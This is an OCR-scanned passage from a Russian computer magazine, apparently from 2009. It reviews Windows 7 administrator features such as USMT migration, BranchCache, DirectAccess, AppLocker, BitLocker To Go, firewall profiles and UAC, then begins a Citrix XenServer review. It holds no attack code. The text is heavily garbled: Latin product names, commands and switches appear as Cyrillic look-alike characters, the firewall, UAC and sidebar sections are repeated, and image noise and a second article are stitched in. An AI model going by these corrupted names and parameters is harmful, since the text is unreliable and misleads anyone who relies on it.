<ЕггогСопГгоі> позволяет указать системные 
файлы, ошибки чтения/записи которых мож- 
но игнорировать, не прерывая операцию. При 
запуске с ключом /§епсопй§ в Сопй^.хті 
создается секция, в которой описаны на- 
иболее типичные ситуации. Две функции 
Мі^ХтІНеірег.ЕііеРгореггіез и Мі^ХтіНеірег. 
СепегаГеОосРаггетз могут быть использованы 
для контроля миграции файлов по опреде- 
ленным критериям (размер, время создания 
и модификации и т.д.) и поиска документов 
пользователя на компьютере. Получить пол- 
ный список файлов, которые будут перенесе- 
ны, можно при помощи специального ключа 
/ІізгШез. Новый раздел <РгоШеСопгго1> пре- 
доставляет возможность изменять членство в 
локальной группе в ходе миграции. 

Перенос пользовательских данных при уста- 
новке системы — самая ответственная часть. 
Главное — ничего не потерять, и сделать так, 
чтобы пользователь, загрузившись в новую ОС, 
сразу мог приступить к работе . Весь процесс 
выглядит следующим образом. Сначала данные 



каталогизируются, затем копируются в безопас- 
ное место и после установки ОС возвращаются 
обратно. Учитывая, что объем данных каждого 
пользователя может превышать несколько Гб, 
это потребует дополнительного места для их 
хранения и ресурсов. В итоге, развертывание 
системы на этом этапе сильно замедляется. В 
новом ѴѴАІК вместо переноса всей информации 
используется так называемая миграция жестких 
ссылок (Нагб ПпкМі§гаГіоп), активируемая 
параметром /ЬагсПіпк. Это позволяет в значи- 
тельной степени сократить объемы копируемых 
данных, а значит, уменьшить время на развер- 
тывание и восстановление системы. 

ЗсапЗРаРе с:\зГоге /о /с /і :шідарр .хгпі 
/ і : шідизег . хті /посотргезз /Ьагсіііпк 
Отныне в с:\$гоге будут храниться жесткие 
ссылки на каждый пользовательский файл. При 
переносе ОС жесткий диск будет очищен (кроме 
файлов, заблокированных такими ссылками) . 
Учитывая, что данные, по сути, не копируются, 
процесс происходит заметно быстрее. За Нагб 
Ііпк Мі§гаГіоп в ХМЬ-файл ах отвечает секция 
< НагсІІіпкЗгогеСопГгоІ > . 

Еще один новый ключ /ѵзс команды ЗсапЗгаГе 
позволяет использовать службу теневого 
копирования (Ѵоіите ЗЬасІоѵѵ Сору) для захвата 
файлов, заблокированных другими приложени- 
ями. Для шифрования данных в третьей версии 
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ШМТ использовался алгоритм ЗЭЕЗ, — теперь 
через параметр /епсгури можно указать АЕ5 с 
ключом 128/192/256 бит. 

Новая версия ѴѴАІК поддерживает уни- 
фицированную командную утилиту 
ЭІ5М (Эеріоутепі: Іта§е 5егѵісіп§ апб 
Мапа^етепі:), используемую для постро- 
ения и обслуживания ѴѴІМ-образов Ѵізіа 
5Р1, ѴѴіп2к8, ѴѴіп2к8 К2 и ѴѴіпсіоѵѵз 7. БІ5М 
функционально заменяет Раскате Мапа^ег 
(рк§т§г.ехе), РЕіт§ и Іпі;1с1§, которые, 
кстати, никуда не делись и также входят 
в состав ѴѴіпсІоѵѵз 7 и ѴѴіп2к8 К2. Можно 
добавлять или удалять драйвера к монтиру- 
емым или уже работающим образам (ранее 
драйвер необходимо было интегрировать 
перед началом развертывания) . Кроме ѴѴІМ, 
возможна работа и с ѴНЭ-образами. Следует 
отметить, ѴѴіпсІоѵѵз 7 позволяет монтировать 
ѴНЭ-диски виртуальных машин, а функция 
ѴНЭ Вооі — легко переходить в виртуальную 
среду и обратно. 

ѴѴАІК поддерживает развертывание ѴѴіпсІоѵѵз 
7 и ѴѴіп2к8 К2 в дополнение к существующим 
ѴѴіпХР 5РЗ, Ѵізіа 5Р1 и ѴѴіп2кЗ. 

Рядовые пользователи для копирования всех на- 
строек и переноса данных на внешний источник 
могут воспользоваться утилитой ѴѴіпсІоѵѵз Базу 
Тгапзіег. 



СЕТЕВЫЕ ВОЗМОЖНОСТИ 

Все нововведения в сетевых протоколах, кото- 
рые были доступны в Ѵізіа и ѴѴіп2к8, интегриро- 
ваны и в ѴѴіпсІоѵѵз 7. Например, поддержка 5МВ 

2.0 означает ускоренное копирование файлов 
по сети за счет пакетной отправки данных, 
когда подтверждение дается на группу, а не 
каждый пакет, как это было в 5МВ 1.0. Измене- 
ния в стеке ТСР/ІР позволяют устанавливать 
динамический размер буфера, тогда как в 5МВ 

1.0 буфер был фиксированный (64 Кб) , что 
замедляло передачу больших потоков данных. 

В результате, средняя скорость копирования 
файлов увеличилась приблизительно в 3 раза! 
Также 5МВ 2.0 различает символические ссылки 
ИТЕ5 и позволяет использовать их в названиях 
сетевых ресурсов. При обмене данными с ОС не 
ниже Ѵізіа, 5МВ 2.0 устанавливается автомати- 
чески; иначе используется устаревшая версия 
протокола. 

В ѴѴіпсІоѵѵз 7 появилась интересная функция 
ВгапсЬСасЬе, позволяющая повысить ско- 
рость работы сети и снизить время загрузки 
приложений и нагрузку на внешний канал за 
счет кэширования данных. Выглядит это так. 
Пользователь открыл страницу или скачал 
файл с сервера головного офиса, — его копия 
сохраняется в кэше. Когда другой пользова- 
тель, входящий в эту же сеть, запрашивает 



аналогичный файл, сервер проверяет запра- 
шиваемые данные на предмет их возможного 
кэширования. Если это подтверждается, то об- 
ратно, вместо повторной передачи всей инфор- 
мации, отправляется только хэш, по которому 
находятся кэшированные данные. ВгапсЬСасЬе 
поддерживает стандартные протоколы НТТР/ 
НТТР5 и 5МВ, что позволяет взаимодейство- 
вать с широким спектром приложений. 

Новая технология может работать в одном из 
двух режимов: 

• Новіесі сасЬе — кэшируемые данные хра- 
нятся на отдельном сервере, работающем под 
управлением ѴѴіп2к8 К2. Этот режим удобен для 
больших сетей. 

• ОізІгіЪиІесІ сасЬе — распределенный кэш, 
когда данные кэшируются на клиентских ком- 
пьютерах и по (широковещательному) запросу 
пересылаются на другие системы. 

При построении ВгапсЬСасЬе учтены все тре- 
бования безопасности. Так, сервер выдаст хэш, 
только убедившись, что данный клиент имеет 
право получить искомый файл. При запросе 
производится сверка версий, гарантируя, что 
будет доставлена только самая последняя редак- 
ция файла. 

Ранее для подключения мобильных систем к 
корпоративной сети использовалась техно- 
логия ѴРЫ, и сам процесс требовал некоторой 
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включить или отключить ѴѴР; доступно всего два статичес- 
ких профиля: доменный и стандартный) и ограничен в плане 
функциональности (например, умеет фильтровать лишь вхо- 
дящий трафик) . ѴІ5Иа получила обновленный ѴѴР, ставший 
одним из компонентов «Центра обеспечения безопасности 
ѴѴіпсіоѵѵз». К главным его особенностям стоит отнести: воз- 
можность фильтрации исходящего трафика, способность вы- 
являть некоторые типы сетевых атак, обеспечение контроля 
доступа программ в сеть, поддержка ІРѵб и ІРзес, настройка 
параметров через объекты групповой политики Сгоир Роіісу 
0^‘есі: (СРО). ѴѴР в Ѵізііа получил три динамических профиля 
настроек (ботаіп, ргіѵаге, риЫіс), которые можно привя- 
зывать к интерфейсам. При подключении к сети система 
идентифицирует эту сеть и применяет наиболее подходящий 
профиль. Если в сети обнаружен контроллер домена, уста- 
навливается ботаіп, а самым защищенным является риЫіс. 
Чтобы при последующем подключении к сети был установ- 
лен тот же профиль, в системе запущена специальная служба 
ПеЦлгогкЬосагіопАѵѵагепезз (№А), сохраняющая информа- 
цию о сети в своей базе данных. 

В Висте единственное (но очень неприятное) ограничение 
связано с тем, что в единицу времени может быть активен 
только один профиль. Если компьютер подключен сразу к 
нескольким сетям, применяется наиболее ограничивающий 
профиль. Это часто вызывает проблемы с подключением. 
Внешне настройки ѴѴР в ѴѴіпбоѵѵз 7 не изменились, но теперь 
может быть активно несколько профилей. В настройках 
шаблонов Ргіѵаііе и РиЫіс пользователь может заблокировать 
все входящие соединения для программ, не включенных в 
список разрешенных (Віоск аіі іпсошіп§ соппесгіопз, іпс1исііп§ 
гЬозе іп Йіе Іізі об аііоѵѵесі рго^гаіш) , — обеспечивая макси- 
мальную защиту. Дополнительно можно получать уведомле- 
ния при попытке новой программы выйти в интернет (Ыоііііу 
те ѵѵііеп ѴѴіпбоѵѵз Рігеѵѵаіі Ыоскз а пеѵѵ рго§гат) . Также легко 
отключить ѴѴР для определенного профиля. Еще одно удобс- 
тво связано с настройками. Ранее все изменения сохранялись 
в активном профиле, и при применении другого профиля 
их приходилось повторять. Теперь можно задать профили, 
для которых производится изменение. В Ѵізііа, чтобы задать 
несколько портов, их необходимо было перечислять через 
запятую; в новой версии можно указывать диапазон. 

Кроме того, сторонние разработчики получили обновлен- 
ный АРІ, позволяющий легко задействовать возможности 
ѴѴР или добавить свои функции. 

УПРАВЛЕНИЕ ЦАС 

В ѴѴіпсіоѵѵз работа с правами администратора сулит множест- 
во удобств — все действия разрешены, не требуется никаких 
дополнительных разрешений для установки программ, 
обновления системы, доступа к разделам жесткого диска 
и прочее. Минус — любой вирус, запущенный из-под при- 
вилегированной учетной записи, выполняется с правами 
администратора, т.е. имеет доступ фактически к любому 
компоненту системы. В ІІпіх проблему решили уже давно. В 
ѴѴіпсіоѵѵз с этим серьезно начали бороться в ѴІ5Га, где впервые 
применен механизм, получивший название ІІАС («Управле- 
ние учетными записями пользователя») . При активном ІІАС 
администраторы работают в системе фактически с правами 
обычного пользователя. Если же для выполнения задачи 
требуются права администратора, то выдается запрос на под- 
тверждение повышения привилегий (в специальном режиме 
Зесиге Эезкгор, не позволяющем программно нажать кноп- 
ку) . И только в этом случае конкретное приложение будет вы- 
полнено с правами администратора. Большим минусом ІІАС 
является его «забывчивость»: он «не запоминает» программу, 
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В настройках ІІАС — четыре уровня реакции 



и потому запрос повторяется при каждом запуске. Механизм 
достаточно прост и в то же время эффективен, но именно 
работа НАС вызывала и вызывает наибольшее раздражение у 
пользователей Ѵізна своими постоянными запросами во вре- 
мя установки новой программы и при запуске исполняемого 
файла. Настройки работы ІІАС вѴізГа отсутствуют как класс, 
можно лишь включить /отключить и заставить админа 
каждый раз вводить пароль для подтверждения своих полно- 
мочий. В Шіх к такому привыкли, но пользователь ѴѴіпсІоѵѵз 
все-таки избалован. Поэтому первое, что делает юзер сразу 
после установки Ѵізііа, — отключает ІІАС . Здесь можно 
порекомендовать утилиту ТѵѵеаШАС (ѵѵтѵ.іѵѵеак-иас.сот) , 
которая помимо отключения и включения ІІАС, позволяет 
перевести его в «тихий» режим. В этом случае ІІАС включен, 
но запросы по большинству незначительных параметров не 
будут выводиться и досаждать пользователю. 

Разработчики прислушались к мнению пользователей, и в 
ѴѴіпс1о\ѵ5 7 появилось четыре варианта настроек ІІАС. Они 
находятся в «Сопігоі Рапеі — Зузиет апб Зесигігу — СЬап§е 
Шег Ассоит Сопігоі зениту»: 

• АЬѵаузпогііу — запрос выдается в любом случае (каквѴізГа); 

• Эебаик (установлен по умолчанию) — оповещение про- 
изводится только в том случае, если системные настройки 
изменяются программно; если же действие производит заре- 
гистрировавшийся пользователь, ІІАС не задает вопросов; 

• Шпіу те опіу ѵѵііеп рго§гатз Хгу Со таке скап^ез Со ту 
сотртег — похож на предыдущий, только Зесиге Эезкюр при 
вызове ІІАС не используется; 

• Иеѵег посііу уои — отключить ІІАС . 

Последние два пункта отмечены как не рекомендуемые, но 
скажем, что работа в Эебаик довольно комфортна. Кстати, в 
настоящее время ІІАС никак не реагирует, если приложение, 
запущенное пользователем, пытается изменить настройки 
ІІАС. Это позволяет незаметно его отключить, и данную 
ошибку планируют устранить в КС 1 . 

СЛОЖНАЯ ПРИЧЕСКА 

Изменений в ѴѴіпбоѵѵз 7 достаточно много. Простой причес- 
кой ѴІ5Иа здесь не обошлось. У администратора появилось 
больше возможностей по организации удобной и безо- 
пасной среды — алгоритм многих функций и элементов 
кардинально перестроен. Но реализовать некоторые из них 
удастся только при наличии новой версии сервера ѴѴіп2к8 К2 
(ѴѴіпс1о\ѵ5 Зегѵег 7) . Поговорим о нем в одном из следующих 
номеров. 1 т 




> ІПІО 



• Подробнее о ѴѴАІК 
читай в статье «Са- 
мосборные окна» в 
январском номере 
т за 2009 год. 

• После публика- 
ции ѴѴіпбоѵѵз 7 Веіа 
МісгозоЙ получила 
более полумиллиона 
рационализаторс- 
ких предложений от 
пользователей -тес- 
теров со всего мира. 

• Набрав в поле поис- 
ка меню «Пуск» текст 
ѵѵіпѵег, можно увидеть 
окно «О системе», 
где отображена вся 
информация о версии 
и номере сборки 
ѴѴіпбоѵѵз 7, включая 
дату истечения срока 
активации. 

• ЭігесіАссезз можно 
настроить так, чтобы 
через сервер прохо- 
дил только трафик, 
предназначенный 
для корпоративной 
сети. 
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Активируем ВііБоскегТоѲо для флешки 



Настройки в ѴѴіпбоѵѵз 7 более логичны 
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1 г 

> Ііпкз 

• Бета-версию 
ѴѴіпсІоѵѵз АІ К для 
ѴѴіпсІоѵѵз 7 можно 
загрузить с ІесНпеБ 
ті егозой, сот/ 

ІіЬга гѵ/сі 6349343. 
азрх . 

• Блог разработчиков 
ѴѴіпсІоѵѵз 7 — Ы-рдз. 
тзбп.сот/е7ги . 
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подготовки пользователя, не говоря уже о том, что админ 
должен был все правильно настроить. При наличии в компа- 
нии клиентских систем ѴѴіпсІоѵѵз 7 и сервера ѴѴіп2к8 К2 для 
доступа к ресурсам внутренней сети можно использовать 
новую функцию ПігесіАссезз, позволяющую устанавли- 
вать защищенное соединение по протоколам ІРзес и ІРѵб, 
применяя для шифрования трафика алгоритм ЗБЕЗ или АЕ5. 
Схема такой связи внешне похожа наѴРЫ. Главным отличи- 
ем ПігесіАссезз от ѴРЫ является установление соединения в 
фоновом режиме без участия пользователя. Это делает работу 
прозрачной, максимально простой и удобной. Системный 
администратор может управлять удаленной системой путем 
обновления групповых политик, которые применяются до 
входа пользователя в систему. Кроме авторизации компьюте- 
ра, поддерживается многоуровневая проверка подлинности 
пользователя (пароль, смарт-карта) . Теперь доступ к ресурсам 
внутренней сети для каждого пользователя можно настраи- 
вать отдельно. Нельзя не отметить, что ѴѴіпсІоѵѵз 7 автомати- 
чески находит сетевые принтеры и настраивает устройства. 
Более того, для каждой сети можно задать свой принтер по 
умолчанию. Ранее это требовало вмешательства со стороны 
админа/пользователя, а в некоторых случаях — применения 
скриптов и сторонних утилит. 

Благодаря седьмой версии протокола КОР, клиент КетоГе 
Безкшр СНеЩ получил новые возможности. Среди них — 
поддержка технологий Аего Сіазз, 0ігесі;20 и ОігесгЗБ 10.1, 
ОігесгЗЬоѵѵ, Мебіа Еоипбагіоп. Увеличена производитель- 
ность, уменьшены задержки звука и многое другое. Удален- 
ный рабочий стол весьма быстро реагирует на события даже 
во время просмотра видео в высоком качестве. 

ТЕХНОЛОГИИ БЕЗОПАСНОСТИ 

Одной из интересных новинок в ѴѴіпбоѵѵз 7 можно назвать 
АррБоскег, позволяющий управлять работой приложений. 
Используя его, админ может четко задать программы, кото- 
рые разрешается запускать на пользовательских компью- 
терах. Технология контролирует все типы файлов, которые 
могут нанести вред системе: исполняемые и установочные 
файлы (ехе, тзі, тзр), скрипты (Ъац стб, ѵЪз, )з) и библио- 
теки (611, осх) . Прежде для этих целей приходилось задейс- 
твовать несколько запутанные политики ограниченного 



использования программ 5КР (Зобѵѵаге КезГгісбоп Роіісіез) . 
Настройка АррБоскег производится при помощи групповых 
политик на сервере ѴѴіп2к8 К2. При построении правила 
можно указать путь к файлу, хэш и цифровую подпись. 

Если приходится делить компьютер с другими пользователя- 
ми, которые любят менять настройки или способны удалить 
чужой файл, на помощь придет функция «РС 8а1е§иагб», 
которая активируется установкой переключателя «Тигп Оп 
РС За1е§иагб» в свойствах обычной (не админской) учетной 
записи. После выхода из системы все изменения в настрой- 
ках будут отменены, а новые файлы — удалены (после регис- 
трации в системе или создании нового файла пользователь 
предупреждается об этом) . Есть возможность выделить каж- 
дому пользователю логический диск определенного размера. 
Ранее, чтобы получить функциональность РС $аіе§иагб, не- 
обходимо было устанавливать отдельную утилиту ѴѴіпбоѵѵз 
ЗіеабуЗіаіе ( чо.тісгозоЙ.сот/Аѵііпк/РБіпкІР =117 104) . 
Сейчас эта функция встроена, и возможно, получит большую 
популярность. ВііБоскег, при помощи которого можно 
полностью зашифровать системный раздел или раздел с дан- 
ными (начиная с Ѵізса 5Р1), получил в ѴѴіпбоѵѵз 7 дальнейшее 
развитие. Во время установки автоматически происходит 
создание двух разделов (загрузочного и системного), необ- 
ходимых для работы ВпБоскег. Напомним, некогда пользо- 
ватель должен был позаботиться об этом самостоятельно. 
Новая технология, получившая название ВпБоскегТоСо, 
позволяет шифровать и внешние носители (флешки или 
жесткие диски), отформатированные в ЕАТ/ЕАТ32, ЕхЕАТ 
или ОТЕЗ. Доступ к зашифрованным носителям возможен по 
паролю или смарт-карте с любого компьютера. Правда, если 
это будет не ѴѴіпбоѵѵз 7, то удастся лишь чтение данных. Сам 
ВпБоскег для выбранного раздела или сменного носителя 
теперь можно включить в контекстном меню, выбрав пункт 
«Тигп Оп ВпБоскег» (не надо искать его в «Панели Управле- 
ния») . Обратная операция по расшифровке флешки также не 
трудна. 

ИЗМЕНЕНИЯ В ѴУІЫБОѴѴБ РІРЕѴѴАБІ 

Первые версии ѴѴіпбоѵѵз не имели встроенных средств бло- 
кировки сетевого трафика, но многочисленные эпидемии 
показали необходимость в этом. Начиная с ѴѴіпХР 5Р1, поль- 
зователи получили ѴѴіпбоѵѵз Еігеѵѵаіі, который с 5Р2 активи- 
руется по умолчанию. Хотя первое, что делает любой юзер 
после установки системы, — отключает ѴѴЕ. И все потому что 
он кишит ошибками, не удобен в настройке (можно только 
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включить или отключить ѴѴР; доступно всего два статичес- 
ких профиля: доменный и стандартный) и ограничен в плане 
функциональности (например, умеет фильтровать лишь вхо- 
дящий трафик) . Ѵізт получила обновленный ѴѴР, ставший 
одним из компонентов «Центра обеспечения безопасности 
ѴѴіпсІоѵѵз». К главным его особенностям стоит отнести: воз- 
можность фильтрации исходящего трафика, способность вы- 
являть некоторые типы сетевых атак, обеспечение контроля 
доступа программ в сеть, поддержка ІРѵб и ІРзес, настройка 
параметров через объекты групповой политики Сгоир Роіісу 
ОЬ^есГ (СРО). ѴѴР в ѴІ5Га получил три динамических профиля 
настроек (ботаіп, ргіѵаге, риЫіс), которые можно привя- 
зывать к интерфейсам. При подключении к сети система 
идентифицирует эту сеть и применяет наиболее подходящий 
профиль. Если в сети обнаружен контроллер домена, уста- 
навливается ботаіп, а самым защищенным является риЫіс. 
Чтобы при последующем подключении к сети был установ- 
лен тот же профиль, в системе запущена специальная служба 
Шгѵѵогк Ьосагіоп Аѵѵагепезз (ЖА), сохраняющая информа- 
цию о сети в своей базе данных. 

В Висте единственное (но очень неприятное) ограничение 
связано с тем, что в единицу времени может быть активен 
только один профиль. Если компьютер подключен сразу к 
нескольким сетям, применяется наиболее ограничивающий 
профиль. Это часто вызывает проблемы с подключением. 
Внешне настройки ѴѴЕ вѴѴіпсІоѵѵз 7 не изменились, но теперь 
может быть активно несколько профилей. В настройках 
шаблонов РгіѵаГе и РиЫіс пользователь может заблокировать 
все входящие соединения для программ, не включенных в 
список разрешенных (Віоск аіі іпсотіп§ соппесгіопз, іпс1и<ііп§ 
йюзе іп Йіе Нзг оі аііоѵѵесі рго§гатз) , — обеспечивая макси- 
мальную защиту. Дополнительно можно получать уведомле- 
ния при попытке новой программы выйти в интернет (кГогііу 
те ѵѵЬеп ѴѴіпсІоѵѵз Рігеѵѵаіі Ыоскз а пе\ѵ рго§гат) . Также легко 
отключить ѴѴЕ для определенного профиля. Еще одно удобс- 
тво связано с настройками. Ранее все изменения сохранялись 
в активном профиле, и при применении другого профиля 
их приходилось повторять. Теперь можно задать профили, 
для которых производится изменение. В Ѵізт, чтобы задать 
несколько портов, их необходимо было перечислять через 
запятую; в новой версии можно указывать диапазон. 

Кроме того, сторонние разработчики получили обновлен- 
ный АРІ, позволяющий легко задействовать возможности 
ѴѴЕ или добавить свои функции. 

УПРАВЛЕНИЕ ЫАС 

В ѴѴіпсІоѵѵз работа с правами администратора сулит множество 
удобств — все действия разрешены, не требуется никаких 
дополнительных разрешений для установки программ, обнов- 
ления системы, доступа к разделам жесткого диска и прочее . 
Минус — любой вирус, запущенный из-под привилегирован- 
ной учетной записи, выполняется с правами администратора, 
т.е. имеет доступ фактически клюбому компоненту системы. 

В Шіх проблему решили уже давно. В ѴѴіпскжз с этим серьезно 
начали бороться в Ѵізт, где впервые применен механизм, 
получивший название НАС («Управление учетными записями 
пользователя») . При активном НАС администраторы работают 
в системе фактически с правами обычного пользователя. Если 
же для выполнения задачи требуются права администратора, 
то выдается запрос на подтверждение повышения привиле- 
гий (в специальном режиме Зесиге Эезкгор, не позволяющем 
программно нажать кнопку) . И только в этом случае конкрет- 
ное приложение будет выполнено с правами администратора. 
Большим минусом ПАС является его «забывчивость»: он «не 
запоминает» программу, и потому запрос повторяется при 



ХАКЕР 05 /1 25/ 09 





№ ^ ^ Ч ^ №*■ ^ а; I* 300*"' ОІ^ІѲ ■ ш * с ДИ 



■ ■ "!'іі Шщ • г + і іи.... . 












ГРЫИР "Ѵ р 






т 1 



■Стооѣі- Ті? I» п&М'Ц} 1р ртмг 

иы- -і;ссииі:ьпр=ІГі*трі-і# п ;піт і ф ■ пи Дтггл ; . 

Р, . 1 ... -Г 







II ГІѴ іЦІрШѵ ИІІГИ М , яі 

Г| М І I» -НШІ 






В настройках ІІАС — четыре уровня реакции 



каждом запуске. Механизм достаточно прости в тоже время 
эффективен, но именно работа НАС вызывала и вызывает 
наибольшее раздражение у пользователей Ѵізт своими пос- 
тоянными запросами во время установки новой программы 
и при запуске исполняемого файла. Настройки работы ІІАС в 
Ѵізт отсутствуют как класс, можно лишь включить/отключить 
и заставить админа каждый раз вводить пароль для под- 
тверждения своих полномочий. В Шіх к такому привыкли, но 
пользователь ѴѴіпсіоѵѵз все-таки избалован. Поэтому первое, 
что делает юзер сразу после установки Ѵізт, — отключает ІІАС. 
Здесь можно порекомендовать утилиту ТѵѵеаШАС (\ѵтѵ. 
Гѵѵеак-иас.сот) , которая помимо отключения и включения 
НАС, позволяет перевести его в «тихий» режим. В этом случае 
НАС включен, но запросы по большинству незначительных 
параметров не будут выводиться и досаждать пользователю. 
Разработчики прислушались к мнению пользователей, и в 
ѴѴіпбоѵѵз 7 появилось четыре варианта настроек ІІАС. Они на- 
ходятся в «СопГгоІ Рапеі — Зузиет апсі Зесигку — Скап§е ІІзег 
Ассоит Сопігоі зетп§»: • Акѵауз погііу — запрос выдается в 
любом случае (как в Ѵізт); • Эеіаик (установлен по умолча- 
нию) — оповещение производится только в том случае, если 
системные настройки изменяются программно; если же 
действие производит зарегистрировавшийся пользователь, 
ИАС не задает вопросов; 

• Иойіу те опіу ѵѵЬеп рго§гатз ту Го таке скап§ез Го ту 
сотригег — похож на предыдущий, только Зесиге Эезкгор при 
вызове ІІАС не используется; 

• Ыеѵег погііу уои — отключить ИАС . 

Последние два пункта отмечены как не рекомендуемые, но 
скажем, что работа в Эеіаик довольно комфортна. Кстати, в 
настоящее время РАС никак не реагирует, если приложение, 
запущенное пользователем, пытается изменить настройки 
ИАС. Это позволяет незаметно его отключить, и данную 
ошибку планируют устранить в КС 1 . 

СЛОЖНАЯ ПРИЧЕСКА 

Изменений в ѴѴіпскжз 7 достаточно много. Простой причес- 
кой Ѵізт здесь не обошлось. У администратора появилось 
больше возможностей по организации удобной и безопасной 
среды — алгоритм многих функций и элементов кардинально 
перестроен. Но реализовать некоторые из них удастся только 
при наличии новой версии сервера ѴѴіп2к8 К2 (ѴѴіпбоѵѵз Зегѵег 
7) . Поговорим о нем в одном из следующих номеров. не 
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• Подробнее о ѴѴАІК 
читай в статье «Са- 
мосборные окна» в 
январском номере 
□С за 2009 год. 

• После публика- 
ции ѴѴіпбоѵѵз 7 ВеГа 
МісгозоЙ получила 
более полумиллиона 
рационализаторс- 
ких предложений от 
пользователей -тес- 
теров со всего мира. 

• Набрав в поле поис- 
ка меню «Пуск» текст 
ѵѵіпѵег, можно увидеть 
окно «О системе», 
где отображена вся 
информация о версии 
и номере сборки 
ѴѴіпсіоѵѵб 7, включая 
дату истечения срока 
активации. 

• ОігесіАссеББ можно 
настроить так, чтобы 
через сервер прохо- 
дил только трафик, 
предназначенный 
для корпоративной 
сети. 
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итххепъегѵег: овзор новой версии платформы виртуализации 





По мере увел имения вычислительных мощностей на рынке систем 
виртуализации становится все жарче. Ситуацию можно сравнить 
с зоной боевых действий. Практически все игроки, чтобы привлечь 
рядовых пользователей и крупных заказчиков, уже предложили бес- 
платные версии своих продуктов (правда, с несколько ограниченной 
функциональностью). В конце февраля компания Сіігіх объявила, что 
ХепБегѵег, начиная с релиза 5.0, также будетбесплатным. 



ВИРТУАЛИЗАЦИЯ СТАНОВИТСЯ ВСЕ ПОПУ- 
ЛЯРНЕЕ. Еще бы, — на одном физическом сер- 
вере можно без проблем разместить несколько 
виртуальных, снизив затраты на оборудование и 
повысив эффективность . Процедура восстановле- 
ния виртуального сервера выглядит проще, ведь 
админу достаточно перенести файлы на другой 
доступный сервер, будь то физический или вир- 
туальный. Сегодня на рынке доступно множество 
решений виртуализации, обладающих разной 
функциональностью и распространяемых под 
различными лицензиями: Місгозоіт Нурег-Ѵ, 
ѴМѵѵаге Е5Х Зегѵег, Рагаііеіз Эезктр/ѴѴогкзЕагіоп/ 
Зегѵег, Слегли, ѴігШаІВох, Ѵігшаі Ігап, ХепЗегѵег, 
Огасіе ѴМ и т.д. В основе последних трех лежит 
свободный гипервизор Хеп, который известен 
тем, что одним из первых обеспечил поддержку 
полной аппаратной виртуализации Ішеі ѴТ и 
АМБЗѴМ. 

ВОЗМОЖНОСТИ СІТКІХ ХЕЫ5ЕКѴЕК 5.0 

Новая версия ХепЗегѵег включает множество 
функций, ранее доступных в платных решениях. 
Перечислю только некоторые из них: 

• неограниченное количество серверов и вирту- 
альных машин; 

• динамическая балансировка нагрузки; 

• миграция виртуальных машин (Ііѵе Могіоп) 
между физическими серверами без прерывания 



обслуживания при условии того, что ресурсы не- 
скольких серверов объединены в пул. 

Рабочая нагрузка динамически перераспределя- 
ется не только между виртуальными, но и физи- 
ческими серверами. Это существенно упрощает 
управление. ХепЗегѵег спроектирован с учетом 
требований по предоставлению высокого уровня 
доступности системы (Ні§1і АѵаіІаЬіІіГу) . Рабочую 
ОС, установленную на любом физическом серве- 
ре, можно легко конвертировать в виртуальную 
(Р2Ѵ) систему. Есть поддержка всех существую- 
щих систем хранения данных (локальный диск, 
ЫАЗ, ЗАЛ и т.д.) . Официально в качестве гостевых 
систем поддерживаются: 

• все версии ѴѴіпсіоѵѵз, начиная от 2к 5Р4 до 2008, 
в том числе и 64-битные с паравиртуальными 
драйверами, сертифицированными ѴѴНС^Ь 
(ѴѴіпсІоѵѵз Нагсіѵѵаге ОиаШуЬаЪ) ; 

• 51І5Е Ешегргізе Ьіпих от 9 32/64 бит; 

• Кеб Наі: ЕШегргізе Ьіпих от 3.x и СепЮЗ от 4.5; 

• Огасіе Ешегргізе Ьіпих от 5.0; 

• ПеЬіап 5аг§е/Егс1і. 

Некоторые характеристики виртуальной маши- 
ны будут зависеть от используемой гостевой ОС. 
В общем случае это: 8 СРИ (64-битный) с возмож- 
ностью тонкой настройки ресурсов, до восьми 
виртуальных дисков (включая СЭ-КОМ) и до семи 
сетевых карт. Поддерживается горячее подклю- 
чение виртуальных дисков и сетевых устройств. 



Виртуальная машина не имеет ограничений на 
количество используемой оперативной памяти: 
все, что сможет выдать сервер, будет доступно ѴМ. 
Для удаленного управления серверами, ѴМ, вир- 
туальными дисками и пулами используетсяудоб- 
ная и понятная в работе консоль ХепСепГег. Что 
ж, теперь познакомимся с ХепЗегѵег поближе. 

УСТАНОВКА СІТГСІХ ХЕЫ5ЕКѴЕГС Дляустанов- 
ки ХепЗегѵег понадобится компьютер, имеющий 
характеристики не ниже 1.5Ггц64хСРЫ, 1 ГбКАМ 
и не менее 16 Гб места на харде. Во время установ- 
кибудетсозданодвараздела:корневойсХеп5егѵег 
размером в 4 Гб и раздел для ѴМ. Некоторые гос- 
тевые ОС потребуют больше места, чем указано 
в минимальной конфигурации. Например, для 
Ѵізт необходим виртуальный диск размером в 16 
Гб — то есть, суммарно жесткий диск должен быть 
не менее 20 Гб (4 + 16 Гб) . Для комфортной работы 
эти цифры смело умножаем на 2, а для диска — на 
5. Минимальных требований следует придержи- 
ваться в любом случае, иначе мастер установки 
после проверки оборудования просто откажется 
работать. Для запуска гостевой ѴѴіпбоѵѵз процес- 
сор должен иметь поддержку технологии аппа- 
ратной виртуализации Ішеі ѴТ/АМЭ-Ѵ; в случае с 
Ьіпих такая поддержка необязательна. 
Установочный 150-образ можно свободно скачать 
по ссылкам на сайте ѵѵѵѵѵѵ.хеп5егѵег5.сот . Для 
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Для бюджета значимым является не стоимость ПО на базе гипервизора как таковая, 
а совокупная стоимость владения ИТ- инфраструктурой. Статья расходов на гипер- 
визоры ничтожна мала по сравнению с ценой железа, лицензий на платформенное 
ПО и системы хранения, расходами на администрирование и поддержку. И когда 
говорят о бесплатных продуктах виртуализации, по эффекту это сравнимо с тем, что 
продают двигатель, уверяя, что покупаешь машину. Для малого и среднего бизнеса 
бесплатный гипервизор — это приятный бонус. Может быть, для 2-3 серверов до- 
статочно стандартных, включенных в бесплатное решение средств управления. Но 
в крупной компании с целым пар ком серверов принципиальное значение приобре- 
тает обща я плотность размещения виртуальных серверов на физических машинах 
(при контейнерной виртуализации науровнеОС плотность в 3-5 раз превосходит 
по показателям гипервизоры, будь то ХепЗегѵег, ЕЗХі Зегѵегили Нурег-Ѵ) и в оз мож- 
но стиихуправления. И чем больше серверов, тем средства управления важнее — 
при необходимости сокращать затраты на инфраструктуру именно они дают понять, 
что в действительности является «бесплатным». 

Максим Кузькин, Системный архитектор департамента виртуализации Рагаііеіз 

[ ѵѵѵѵѵѵ.рагаЦеІБ.сот/ги І. 




установки нам понадобятся два образа, подпи- 
санные как іпзіаіі-ссі и Нпих-сб. На первом, кроме 
собственно файлов, позволяющих установить 
или обновить ХепЗегѵег, находится инсталлятор 
консоли управления ХепСепіег и паравиртуаль- 
